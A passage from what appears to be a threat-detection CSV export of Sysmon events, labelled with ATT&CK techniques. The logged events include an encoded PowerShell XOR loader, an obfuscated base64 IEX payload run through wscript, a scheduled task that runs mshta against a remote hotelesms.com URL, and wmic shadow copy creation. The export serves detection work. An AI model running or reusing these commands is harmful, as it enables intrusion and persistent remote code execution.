<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:32:58.167195Z"">
</TimeCreated>
<EventRecordID>16390</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:32:58.167</Data>
<Data Name=""ProcessGuid"">365ABB72-208A-5CD8-0000-0010119B2400</Data>
<Data Name=""ProcessId"">3560</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ParentProcessId"">2936</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-22T04:02:11.307031Z"">
</TimeCreated>
<EventRecordID>839</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1920"" ThreadID=""824"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-22 04:02:11.287</Data>
<Data Name=""ProcessGuid"">365ABB72-C9C3-5CE4-0000-00101F422E00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C32E-5CE4-0000-00205DF00000</Data>
<Data Name=""LogonId"">0xf05d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-C9C1-5CE4-0000-00100B222E00</Data>
<Data Name=""ParentProcessId"">3156</Data>
<Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; SCODEF:1600 CREDAT:275470 /prefetch:2</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.478285Z"">
</TimeCreated>
<EventRecordID>6182</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.456</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010D33A0C00</Data>
<Data Name=""ProcessId"">3344</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ParentProcessId"">3448</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:20.711067Z"">
</TimeCreated>
<EventRecordID>4907</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:19.556</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49826</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:59.769825Z"">
</TimeCreated>
<EventRecordID>4129</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:59.729</Data>
<Data Name=""ProcessGuid"">365ABB72-1A2B-5CE4-0000-00102F502201</Data>
<Data Name=""ProcessId"">3772</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR &quot;mshta.exe https://hotelesms.com/Injection.txt&quot; /F </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ParentProcessId"">2432</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T22:52:27.588976Z"">
</TimeCreated>
<EventRecordID>10154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1936"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 22:52:27.588</Data>
<Data Name=""ProcessGuid"">365ABB72-D1AB-5CC8-0000-0010DB1E4400</Data>
<Data Name=""ProcessId"">1372</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
<Data Name=""LogonId"">0xffe4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
<Data Name=""ParentProcessId"">2892</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T11:53:30.022856Z"">
</TimeCreated>
<EventRecordID>10662</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 11:53:29.768</Data>
<Data Name=""ProcessGuid"">747F3D96-F639-5D53-0000-0010B0FC2600</Data>
<Data Name=""ProcessId"">8180</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-F639-5D53-0000-001092EE2600</Data>
<Data Name=""ParentProcessId"">6000</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:vdir.name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.822932Z"">
</TimeCreated>
<EventRecordID>5937</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.782</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00106FA6FF00</Data>
<Data Name=""ProcessId"">1876</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:vdir.name</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
